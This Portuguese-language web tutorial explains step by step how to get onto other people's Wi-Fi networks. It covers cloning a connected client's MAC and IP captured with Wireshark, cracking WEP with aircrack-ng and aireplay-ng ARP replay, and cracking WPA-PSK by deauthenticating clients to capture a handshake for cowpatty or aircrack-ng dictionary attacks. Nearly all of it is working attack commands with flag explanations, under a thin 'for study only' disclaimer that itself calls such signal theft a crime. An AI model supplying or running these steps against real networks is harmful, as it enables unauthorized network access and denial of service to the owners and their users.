Descobrir IP - MAC - WEP - WPA

Venho aqui fazer este tutorial mostrando como nossas redes de internet wifi são frágeis e facilmente são invadidas, possibilitando assim que usem nossa internet sem permissão!

Vou mostra aqui algumas técnicas de conectar em redes aberta ou protegidas, este tutorial e apenas para estudo, para que possamos proteger nossas redes contra ataques deste tipo, não me responsabilizo por mau uso destas técnicaslembrando que furto de sinal de internet é crime com Pena de detenção, de três meses a um ano, e multa, por isso seja consciente do que você esta fazendo!

Bom vamos começar!


conectando em rede sem proteção no Windows

Redes sem proteção = estas redes são facilmente invadidas pois geralmente você só tem que saber um ip valido na rede para scanea-la e obter um ip e mac validos


Windows

Primeiro conecte na rede normalmente



Bom como não sabemos nem mac nem ip de um cliente para conectar, vamos ter que conseguir, para isso vamos usar um programa chamado wireshark!

Wireshark 
http://www.easy-share.com/1904123477...etup-1.0.0.exe

Instale o wireshark, depois de instalar vamos capturar alguns pacotes para pegar os dados, 

Abram o wireshark, click em show the capture options … 




Vai aparecer uma janela com algumas configurações:

Faça as seguintes modificações:

1 - Em interface, escolha seu dispositivo wifi,(placa pci,usb,etc...), no meu caso atheros AR5005G

2 - Desmarque a opção: capture packets in promíscuos mode

3 - Clique em start!



Vai começar a captura, capture alguns pacotes, até que você consiga pacotes ARP (ficam destacados na cor azul claro).

Depois de capturar alguns pacotes, pare a captura, vá em filter e escreva “ARP” (em aspas).

Vai filtrar no por pacotes ARP!


Veja na figura abaixo os possíveis dados que encontramos,



Bom agora temos ip, gateway, e mac.

Precisamos ainda da mascare de rede e dns

Mascara de rede = geralmente a mascara de rede é 255.255.255.0 ou 255.0.0.0 ou 255.255.255.252

Dns = a dns você pode tentar capturar igual você fez com o ip, usando o wireshark, mas geralmente todas as redes funcionam usando os dns públicos, o dns que eu uso e 200.176.2.10

Pronto agora temos todos os dados em mãos, precisamos clonar o mac address,

Baixem o programa a-Mac Address Change

http://www.easy-share.com/1904125843... ZANZIBA00.rar

Instale-o normalmente, o registre com o serial que vem junto com ele.

Abra o programa

1 = escolha a interface a qual você quer trocar o mac, no meu caso a atheros ar5005g

2 = neste campo digitem o mac que você capturou no wireshark, (obs. sem os “:”)

3 = click em change mac to, click em yes , e yes novamente, o PC vai reiniciar


Pronto, agora e só ir às propriedades de conexão / protocolo tcp/ip / propriedades e adicionar ip, gateway, mascara de rede e dns que você já tem, click em ok e pronto!


Notas, depois que você conectar na rede e estiver navegando na internet, através do a-Mac Address Change você pode conseguir mais macs e ips, e apenas clicando em scan, aparecerão todos os ip que estiverem conectados na rede.



-------------------------------------------------------------------------------------------------

Agora vamos quebrar a wep no linux
que em minha opinião e muito mais fácil do que no Windows, alem do que tem um suporte muito maior a modo monitor, pois muitas placas só entram em modo monitor no linux.



wifislax 3.1

ftp://files.tuto-fr.com:8080/distro/wifislax-3.1.iso

Bom minha placa e uma atheros AR5005G
Existem varias distros de linux, não vou entrar em detalhes de como instalar os programas, pois iria levar muito tempo, se você tem dificuldade em instalar programas no linux, baixe um live CD de auditoria em redes wifi, eu vou usar o wifislax 3.1

1 - vamos abrir uma janela do Shell

Vamos a os comandos, estes comandos são digitados 1 a 1, e sem o #, que no caso seria wifislax#...

2 - vamos trocar o mac para 00:11:22:33:44:55

#ifconfig ath0 down
#ifconfig ath0 hw ether 00:11:22:33:44:55
#ifconfig ath0 up


3 - vamos colocar a placa em modo monitor

#wlanconfig ath0 destroy
#modprobe -r ath_pci
#modprobe ath_pci autocreate=monitor


4 - vamos usar o airodump para capturar os pacotes .ivs para quebrar a wep com o aircrack, e preciso de pelo menos 400 mil pacotes, (este numero pode variar, mas aqui eu precisei disso)

Legenda do comando usado abaixo

-W = entrada por nome de pacote
wep = nome do pacote de captura
--dssid = mac do ap que você quer quebra a wep
-c = canas do ap que você quer quebrar a wep
ath0 = interface da minha placa, eu só tenho placa atheros, ai não sei se varia para outros modelos e marcas

Comando

#airodump-ng --ivs -w wep --bssid 00:00:00:00:00 -c 10 ath0

Ai ira começar a captura, lembrando que aqui eu precisei de 400 mil pacotes,


5 - você tem como agilizar a captura usando uma autentificação falsa

Legenda do comando usando abaixo:

-1 = autentificação falsa
0 = tempo em segundos da reassociação
-e = entrado do nome do ap que você vai quebra wep
-a = mac do ap que você quer quebrar a wep
-h = mac de um cliente que autenticou lá no airodump


Comando:

#aireplay-ng -1 0 -e apvitima -a 00:00:00:00:00 -h 00:00:00:00:00 ath0


6 - rejeição de arp

Legenda do comando usado abaixo:

-3 = repetição padrão do pedido do arp
-b = mac do ap que você quer quebrar a wep
-h = mac de um cliente que autenticou la no airodump

Comando:

#aireplay-ng -3 -b 00:00:00:00:00 -h 00:00:00:00:00 ath0


Bom depois de alcançar os 400 pacotes feche o airodump e o aireplay

7 - agora vamos quebrar a wep com o aircrack

Abra o sheel

Legenda do comando usado abaixo:

-a = força modalidade de ataque
-1 = wep estática
-0 = aplica cores no aircrack
-n = especifica o tamanho da key, sendo de 64,128,256 bits
Wep-01.ivs = é o pacote que capturamos no airodump , cujo nome posto foi wep, e que por padrão o programa adiciona -01, então se você por exemplo colocou Maria como nome da captura no airodump vai ficar assim, Maria-01.ivs

Comando

#aircrack-ng -a 1 -0 -n 64 wep-01.ivs


Pronto você quebrou a wep no linux
-------------------------------------------------------------------------------------------



Bom agora vou mostrar aqui como quebrar a wep no Windows, 
o Windows e muito ruim para quebrar wep, mas em todo causo ai vai à explicação.


Estou usando uma atheros

Lembrando que você tem que instalar o driver de modo monitor de sua placa wifi

Aqui fica o driver da minha!

http://www.easy-share.com/1904125957..._ZANZIBA00.rar

Bom vamos lá

Você não pode esta conectado em nenhuma rede, certifica se disso, pois se não sei PC pode reiniciar.

Baixe a suíte aircrack e salve com um nome fácil no c:\


aircrack download = http://www.easy-share.com/1904126085..._ZANZIBA00.rar 

Aqui eu salvei com o nome de wep

Vá à pasta bin e abra o airodump-ng



Agora vamos configurar o airodunp

1 = known network adapters: aqui você ira escolher sua interface de rede (placa pci, usb, etc...) no meu caso e atheros ar5005g, que é indicada pelo numero 11.

2 = network interface index nunber: coloque o numero indicado pela interface de rede, no caso 11.

3 = interface types: e o chipset da interfase, no meu caso atheros, que é indicado pela letra a.

4 = channel(s): indica o numero do canal do ap que você quer quebrar a wep, no meu caso 11.

5 = output file name prefix: o nome que vai ficar salvo o arquivo .ivs, no meu caso coloquei wep

6 = only write wep ivs: coloque y



Ai vai começar a captura, capture cerca de 400 mil pacotes.

Depois de ter capturado alguns pacotes vamos quebrar a wep

Vá no iniciar executar e digite cmd

No prompt digite

C:\wep\bin\aircrack-ng -n64 wep.ivs

Legenda do comando acima

-n = tamanho da chave wep 64/128/256
wep.ivs = nome que você deu a captura de arquivos no airodump




Pronto aqui esta a chave de wep



---------------------------------------------------------------------------------------------------


aqui vc vai ver como quebrar wpa com linux, 
este tutorial eu ainda não tive a chance de testar, por falta de rede com wpa aqui, ele não é meu, creditos a ojedai

vamos la

Este procedimento foi usado com o Live CD Wifislax
Após colocar sua placa em modo monitor faça o seguinte:


1) #airodump-ng ath0

Mostra todos os Aps disponíveis, MAC dos Aps, canal, informações que precisamos.
Ath0 = Neste caso é a interface da minha placa wireless, verifique qual é o seu com o comando:
#ifconfig

2) #airodump-ng –b XX:XX:XX:XX:XX:XX –c 11 –w nomedoarquivo ath0

-b = Captura de tráfego no MAC do Ap especificado
-c = Expecifica o canal do Ap em questão
-w = Saída do arquivo.Vai gerar um arquivo “nomedoarquivo.cap”

3) #aireplay-ng -0 30 -a XX:XX:XX:XX:XX:XX -c YY:YY:YY:YY:YY:YY ath0

Lançamos um ataque de negação de serviço.No passo (2) vai dar para vc identificar um ou mais clientes associados, anote o MAC de um deles, fica assim:

-0 = Ataque de negação de serviço
30 = Faz a solicitação 30 vezes.Você pode mudar o valor se quiser.
-a = Endereço MAC do AP
-c = Endereço MAC do cliente pelo qual você quer desassociar

4)#aircrack-ng nomedoarquivo.cap

Esse é um momento importante.WAP utiliza um protocolo que se chama “handshake”,
Ou seja, qdo você tenta se conectar ao Ap o handshake se encarrega de verificar se a senha está correta, e retorna a solicitação. Quando lançamos o ataque de negação de serviço, o cliente foi automaticamente obrigado a enviar nova solicitação (com a chave que precisamos ...
Deve aparecer algo como:

# BSSID.............................ESSID........... ......................Encryption

1....XX:XX:XX:XX:XX:XX......nome do Ap.............WPA (1 handshake)

Tem que aparecer “WPA (1 handshake) e não WPA (0 handshake).Vai dando negação e tentando até conseguir.

5) #genpmk -f wordlist -d hashfile-ratinho -s nome do Ap

Lançamos então “genpmk” para gerar um arquivo “hashfile” que é um arquivo que contém a tão sonhada senha WAP.

-f = Especifica a entrada da sua wordlist

6) #cowpatty -r nomedoarquivo-01.cap -d hasfile-nomedoarquivo -s nome do Ap

Uma vez gerado o hasfile, lançamos cowpatty que nos dará a preciosa senha, aparecerá algo assim:

Cowpatty 4.0 – WPA-PSK dictionary attack . jwright@hasborg.com

Collected all necessary data to mount crack against WPA/PSK passpharase
Starting dictionary athack. Please be patient.

The PSK is “00112233”

Preste atençao, se não der a senha, não desanime, não precisa repetir todo o procedimento pois você já tem o arquivo com a senha lembra (ratinho-01.cap e hasfile-ratinho ). Pegue uma outra wordlist e recomece do item (4) em diante.

Esses procedimentos foram realizados no Wifislax, nele já vem o cowpatty. Se na sua distribução não tiver o cowpatty pode instalar ou fazer o seguinte:
A partir da negação de serviço (Item 3)

#aircrack-ng -a 2 -0 -w wordlist.lst nomedoarquivo-01.cap

-a = Força modulo de ataque
2 = WPA/WPA2-PSK
-0 = Aplica cores
-w = Incremento de dicionário

Acho esse método até mais fácil, da para ver em tempo real passando as senhas da wordlist, tudo bem colorido.

Tópico: Descobrir IP - MAC - WEP - WPA

Nenhum comentário foi encontrado.

Pesquisar no site

© 2012 Todos os direitos reservados.